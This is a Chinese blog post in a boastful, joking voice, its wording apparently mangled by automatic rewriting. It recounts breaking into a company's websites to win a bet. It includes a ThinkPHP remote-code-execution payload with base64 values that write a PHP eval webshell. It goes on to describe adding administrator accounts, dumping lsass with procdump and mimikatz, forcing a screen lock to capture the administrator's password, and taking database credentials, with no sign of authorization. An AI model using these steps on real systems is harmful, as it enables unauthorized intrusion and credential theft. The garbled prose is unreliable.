关于shell:和妹子打赌的getshell之我不做安全了和我一起锄大地吧

1次阅读

共计 2269 个字符,预计需要花费 6 分钟才能阅读完成。

最近就业,漂泊在各大街头和老头老太抢矿泉水瓶,掐架都比不过老太太,一天都没几个瓶子(喂,你们群里有瓶子嘛),回来和妹子锄大地吧。牌运倒是很好,赢了妹子好多局,惹得妹子急了:“你这么牛皮哄哄的,大黑阔了不起是吗,哼,也没见你拿过一个站”。凭借多年的高情商,我不仅没有哄妹子开心,还牛皮哄哄跟她打了赌,说明天就给你拿一个站。“好啊,你去吧。哼,不理你了”。看吧,等我拿下一个站后,她肯定会很崇拜我的。

0x00 信息收集

信息收集绕不开,也是最重要的一个环节。选了某个企业,先对企业的进行域名信息收集。在百度上发现该企业的两个主站,别离是 fxxxx.cc 和 jxxxx.com,别离进行了子域名的搜寻。个别用别人的在线工具,以及 Sublist3r、subDomainsBrute 和 Layer,整合它们的后果,必要时,再百度和 Google 收集。大型的厂商倡议做 N 级域名探测:

一一查看,接着,对各个站点进行指纹识别,能够晓得站点是否为已知的 CMS、应用何种语言或框架等。有时候,云悉可能没有扫出来,能够应用 firefox 的插件 wappalyzer。在云悉能够查看“该单位其余域名”,这个也能够取得更全面的信息。再收集一下备案信息,也可能有意料之外的播种。

接着,对已知的站点 IP 应用在线的端口扫描工具进行扫描,辨认凋谢的端口;最初,对 GitHub、以及谷歌搜寻收集到的信息,进行整合,并作具体记录。当然,两头我省略了像是 whois 等的收集。对于信息收集,就不多说了。

0x01 意外的 getshell

在对 jxxxx.com 进行跟进一步的信息收集与破绽探测时,发现在 URL 后随便增加字符串,服务器会响应一个报错页面,并打印具体的信息。发现该站点应用了 ThinkPHP 框架,且版本号为 5.0.23——外表毫无波澜,实则心田偷乐了一下。凭借多年的 VMware 下的 yy 浸透测试的教训,好吧,我抵赖我是垃圾哈哈哈哈。


ThinkPHP 5.0.x 和 5.1.x 存在 RCE,间接拿出 payload 怼下来就好了。能够看到权限很高,然而无奈,怎么都写不进文件,但这也不能说是相对的好事。这时候,拿给妹子看了一下,“哦,很厉害啵,哼”。啊,能够感触到妹子曾经被我的速度震惊了——这么快!

但我不能自豪,我还要持续,“哦,那你去吧”,看吧,妹子在激励我,盘它!
然而,jxxxx.com 的只剩下 1 个登录框,2 个 UPUPW_NP 页面,然而,对登录框以及 PHPmyadmin 进行了爆破,都没有停顿——啊咧!是我自豪了嘛?

0x02 又一个 shell

别我问为啥是这个题目,切实是想不进去了(狗头保命)。在 crm 登录界面,应用 top500 姓名和弱口令进行爆破,发现会被 BAN 掉;其余的登录处,top500 都显示不存在该用户名——太难了。此时间隔打牌以及一个钟头了,对 fxxxx.cc 的 crm 零碎进行探测时,顺手又来了一个乱写的 URL,又是相熟的界面,此时的 ThinkPHP 版本为 5.0.12,版本号也是在破绽范畴内的。


此时尝试写入 webshell 文件,
payload:index.php? s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))
拜访能够执行 phpinfo(),蚁剑链接:

在另一个站点 demo.fxxxx.cc 上,如法炮制了一个 shell 进去。如下:


顺手又给妹子看了,“哼!不理你了,当前别找我打牌了”!咦,我赢了呀,妹子干嘛不跟我打牌了?妹子肯定是看我赢了恼羞成怒,真大方。我持续搞。

0x03 getshell 后续

当然,最终的目标必定是远程桌面(开了 3389 端口)。故而,在 demo.fxxxx.cc 的 shell 上开终端,增加管理员账户,然而,很可怜地无奈增加进管理员组:

在 crm.fxxxx.cc 的 shell 上开终端,增加管理员账户,胜利增加进管理员用户组。然而远程桌面登录时,提醒连贯被回绝,没有被受权进行近程登录:

平时碰到这样的状况,如果是权限不够不能增加,能够先提权,获取 system 权限。如果曾经是该权限了,还是不能,能够抓取管理员的明文明码。罕用 procdump 获取内存文件 lsass.exe 过程中存储的明文登录明码,接着应用 mimikatz 读取 lsass.dmp,这样就能够了。然而,这个过程,你还须要让管理员登录,这样能力抓取到明文明码,否则将读取到 (null)。所以,此时须要批改注册表,强制锁屏,这样,管理员看到后会从新登录,这样就能够抓取到明文明码了。
然而,折腾了一番,管理员或者是跟妹子打牌去了,没有获取到,我去!
翻看了一下源代码,取了 3 个数据库的登录信息。以下只贴出了 crm.fxxxx.com 的两个数据库:


没什么说的间接连贯就好了,没敢乱动数据,毕竟在外面不能玩手机,怎么和妹子打牌:

0x04 写在最初

第二天,醒来就把这些写下来了。当然,不做后续的测试,虽说拿到了用户的登录用户名明码,然而,也没啥意思了,还是和妹子打牌吧。然而,锄大地建房了,妹子始终不上线,啊咧!妹子输怕了吗?“gun 啊!不想跟你谈话了”。Orz。小破站,foieojoejgoisejgijohgudgadojefoejof 意外了!

PS:文中的一切都是在梦游中产生的:)。

正文完
 0